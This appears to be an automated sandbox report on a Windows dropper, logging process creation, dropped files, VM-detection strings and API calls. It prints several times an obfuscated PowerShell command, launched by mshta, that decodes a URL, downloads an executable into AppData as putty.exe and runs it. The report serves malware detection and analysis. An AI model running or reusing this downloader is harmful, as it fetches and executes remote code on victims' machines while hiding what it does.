Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\putty.exeWindow detected: Number of UI elements: 20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTF($zbaIc, $FeyQCF){[IO.File]::WriteAllBytes($zbaIc, $FeyQCF)};function o($zbaIc){if($zbaIc.EndsWith((X @(254,308,316,316))) -eq $True){Start-Process (X @(322,325,318,308,316,316,259,258,254,309,328,309)) $zbaIc}else{Start-Process $zbaIc}};function Dwm($QOqguGOgy){$XGUiZZx = New-Object (X @(286,309,324,254,295,309,306,275,316,313,309,318,324));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$FeyQCF = $XGUiZZx.DownloadData($QOqguGOgy);return $FeyQCF};function X($PkXNL){$bzLbp=208;$hWqeYBbV=$Null;foreach($TPTApHL in $PkXNL){$hWqeYBbV+=[char]($TPTApHL-$bzLbp)};return $hWqeYBbV};function ubZ(){$h = $env:APPDATA + '\';$qZD = Dwm (X @(312,324,324,320,323,266,255,255,324,312,309,254,309,305,322,324,312,254,316,313,255,334,323,311,324,305,324,312,305,317,255,320,325,324,324,329,255,316,305,324,309,323,324,255,327,262,260,255,320,325,324,324,329,254,309,328,309));$G = $h + 'putty.exe';QTF $G $qZD;o $G;;;;}ubZ;
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTF($zbaIc, $FeyQCF){[IO.File]::WriteAllBytes($zbaIc, $FeyQCF)};function o($zbaIc){if($zbaIc.EndsWith((X @(254,308,316,316))) -eq $True){Start-Process (X @(322,325,318,308,316,316,259,258,254,309,328,309)) $zbaIc}else{Start-Process $zbaIc}};function Dwm($QOqguGOgy){$XGUiZZx = New-Object (X @(286,309,324,254,295,309,306,275,316,313,309,318,324));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$FeyQCF = $XGUiZZx.DownloadData($QOqguGOgy);return $FeyQCF};function X($PkXNL){$bzLbp=208;$hWqeYBbV=$Null;foreach($TPTApHL in $PkXNL){$hWqeYBbV+=[char]($TPTApHL-$bzLbp)};return $hWqeYBbV};function ubZ(){$h = $env:APPDATA + '\';$qZD = Dwm (X @(312,324,324,320,323,266,255,255,324,312,309,254,309,305,322,324,312,254,316,313,255,334,323,311,324,305,324,312,305,317,255,320,325,324,324,329,255,316,305,324,309,323,324,255,327,262,260,255,320,325,324,324,329,254,309,328,309));$G = $h + 'putty.exe';QTF $G $qZD;o $G;;;;}ubZ;Jump to behavior
Source: putty.exe.1.drStatic PE information: section name: .00cfg
Source: putty.exe.1.drStatic PE information: section name: .gxfg
Source: putty.exe.1.drStatic PE information: section name: _RDATA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07CB1691 push ss; retf 1_2_07CB169E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07CB0013 push ds; retf 1_2_07CB0016
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A34F39 push qword ptr [rax+22FFFFCBh]; ret 3_2_00007FF738A34F41
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\putty.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A39980 IsIconic,SetWindowTextW,SetWindowTextA,3_2_00007FF738A39980
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A39B00 IsIconic,ShowWindow,3_2_00007FF738A39B00
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A39A40 IsIconic,SetWindowTextW,SetWindowTextA,3_2_00007FF738A39A40
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A6A030 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WSAStartup,WSAStartup,WSAStartup,3_2_00007FF738A6A030
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4434Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5312Jump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeEvaded block: after key decisiongraph_3-81310
Source: C:\Users\user\AppData\Roaming\putty.exeEvaded block: after key decisiongraph_3-81446
Source: C:\Users\user\AppData\Roaming\putty.exeEvaded block: after key decisiongraph_3-81507
Source: C:\Users\user\AppData\Roaming\putty.exeAPI coverage: 4.6 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7620Thread sleep time: -20291418481080494s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A5FB90 GetWindowsDirectoryA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,GetCurrentProcessId,3_2_00007FF738A5FB90
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A844D0 GetProcAddress,FindFirstFileW,CloseHandle,3_2_00007FF738A844D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: mshta.exe, 00000000.00000003.1737718734.00000000035B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: putty.exe, 00000003.00000002.2898744443.0000020377647000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%
Source: powershell.exe, 00000001.00000002.1714732257.000000000795D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000001.00000002.1717380349.0000000008AA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: powershell.exe, 00000001.00000002.1714732257.000000000795D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: powershell.exe, 00000001.00000002.1715064854.00000000079C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738B02F94 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF738B02F94
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738B02F94 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF738B02F94
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AE94B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FF738AE94B8
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTF($zbaIc, $FeyQCF){[IO.File]::WriteAllBytes($zbaIc, $FeyQCF)};function o($zbaIc){if($zbaIc.EndsWith((X @(254,308,316,316))) -eq $True){Start-Process (X @(322,325,318,308,316,316,259,258,254,309,328,309)) $zbaIc}else{Start-Process $zbaIc}};function Dwm($QOqguGOgy){$XGUiZZx = New-Object (X @(286,309,324,254,295,309,306,275,316,313,309,318,324));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$FeyQCF = $XGUiZZx.DownloadData($QOqguGOgy);return $FeyQCF};function X($PkXNL){$bzLbp=208;$hWqeYBbV=$Null;foreach($TPTApHL in $PkXNL){$hWqeYBbV+=[char]($TPTApHL-$bzLbp)};return $hWqeYBbV};function ubZ(){$h = $env:APPDATA + '\';$qZD = Dwm (X @(312,324,324,320,323,266,255,255,324,312,309,254,309,305,322,324,312,254,316,313,255,334,323,311,324,305,324,312,305,317,255,320,325,324,324,329,255,316,305,324,309,323,324,255,327,262,260,255,320,325,324,324,329,254,309,328,309));$G = $h + 'putty.exe';QTF $G $qZD;o $G;;;;}ubZ;Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe "C:\Users\user\AppData\Roaming\putty.exe" Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy unrestricted function qtf($zbaic, $feyqcf){[io.file]::writeallbytes($zbaic, $feyqcf)};function o($zbaic){if($zbaic.endswith((x @(254,308,316,316))) -eq $true){start-process (x @(322,325,318,308,316,316,259,258,254,309,328,309)) $zbaic}else{start-process $zbaic}};function dwm($qoqgugogy){$xguizzx = new-object (x @(286,309,324,254,295,309,306,275,316,313,309,318,324));[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;$feyqcf = $xguizzx.downloaddata($qoqgugogy);return $feyqcf};function x($pkxnl){$bzlbp=208;$hwqeybbv=$null;foreach($tptaphl in $pkxnl){$hwqeybbv+=[char]($tptaphl-$bzlbp)};return $hwqeybbv};function ubz(){$h = $env:appdata + '\';$qzd = dwm (x @(312,324,324,320,323,266,255,255,324,312,309,254,309,305,322,324,312,254,316,313,255,334,323,311,324,305,324,312,305,317,255,320,325,324,324,329,255,316,305,324,309,323,324,255,327,262,260,255,320,325,324,324,329,254,309,328,309));$g = $h + 'putty.exe';qtf $g $qzd;o $g;;;;}ubz;
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy unrestricted function qtf($zbaic, $feyqcf){[io.file]::writeallbytes($zbaic, $feyqcf)};function o($zbaic){if($zbaic.endswith((x @(254,308,316,316))) -eq $true){start-process (x @(322,325,318,308,316,316,259,258,254,309,328,309)) $zbaic}else{start-process $zbaic}};function dwm($qoqgugogy){$xguizzx = new-object (x @(286,309,324,254,295,309,306,275,316,313,309,318,324));[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;$feyqcf = $xguizzx.downloaddata($qoqgugogy);return $feyqcf};function x($pkxnl){$bzlbp=208;$hwqeybbv=$null;foreach($tptaphl in $pkxnl){$hwqeybbv+=[char]($tptaphl-$bzlbp)};return $hwqeybbv};function ubz(){$h = $env:appdata + '\';$qzd = dwm (x @(312,324,324,320,323,266,255,255,324,312,309,254,309,305,322,324,312,254,316,313,255,334,323,311,324,305,324,312,305,317,255,320,325,324,324,329,255,316,305,324,309,323,324,255,327,262,260,255,320,325,324,324,329,254,309,328,309));$g = $h + 'putty.exe';qtf $g $qzd;o $g;;;;}ubz;Jump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A739C0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorDacl,GetLastError,LocalFree,LocalFree,3_2_00007FF738A739C0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A73BE0 AllocateAndInitializeSid,AllocateAndInitializeSid,GetLastError,GetLastError,GetLastError,3_2_00007FF738A73BE0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: RegisterClipboardFormatA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoInitializeEx,MessageBoxA,MonitorFromWindow,GetMonitorInfoA,GetDesktopWindow,GetClientRect,CreateWindowExW,GetLastError,MonitorFromWindow,MonitorFromWindow,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,SetWindowLongPtrA,GetWindowRect,GetWindowRect,GetClientRect,GetWindowRect,MonitorFromWindow,GetMonitorInfoA,GetDesktopWindow,GetClientRect,SetWindowPos,CreateBitmap,CreateCaret,SetScrollInfo,GetDoubleClickTime,GetSystemMenu,CreatePopupMenu,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,CreateMenu,DeleteMenu,DeleteMenu,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,GetKeyboardLayout,GetLocaleInfoA,ShowWindow,SetForegroundWindow,GetForegroundWindow,UpdateWindow,PeekMessageW,IsWindow,DispatchMessageW,IsDialogMessageA,PeekMessageA,GetForegroundWindow,MsgWaitForMultipleObjects,DispatchMessageW,PeekMessageW,IsWindow,IsDialogMessageA,3_2_00007FF738A352A7
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: GetLocaleInfoA,DefWindowProcW,3_2_00007FF738A31947
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: GetLocaleInfoW,3_2_00007FF738B00CD8
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00007FF738B08044
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: EnumSystemLocalesW,3_2_00007FF738B08344
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: EnumSystemLocalesW,3_2_00007FF738B08660
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: EnumSystemLocalesW,3_2_00007FF738B0180C
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00007FF738B088E8
